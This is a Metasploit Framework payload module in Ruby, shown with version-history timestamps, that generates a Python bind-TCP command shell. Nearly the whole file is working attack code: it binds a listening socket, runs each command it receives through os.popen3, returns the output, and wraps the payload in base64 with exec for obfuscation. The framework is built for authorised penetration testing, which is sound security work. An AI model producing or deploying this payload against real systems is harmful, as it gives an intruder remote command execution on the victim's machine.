metasploit-framework/modules/payloads/singles/python/shell_bind_tcp.rb

57 lines
1.5 KiB
Ruby
Raw Normal View History

2017-10-23 14:20:19 +00:00
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/python'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
2017-10-24 04:04:02 +00:00
CachedSize = 381
2017-10-23 14:20:19 +00:00
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Bind TCP (via python)',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design',
'Author' => 'mumbai',
'License' => MSF_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'python',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
def generate
super + command_string
end
def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
# Set up the socket
cmd << "import socket,os\n"
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
cmd << "so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\n"
cmd << "so.listen(1)\n"
cmd << "so,addr=so.accept()\n"
cmd << "#{dead}=False\n"
cmd << "while not #{dead}:\n"
cmd << "\tdata=so.recv(1024)\n"
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
cmd << "\tso.send(stdout_value)\n"
# base64
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
cmd
end
end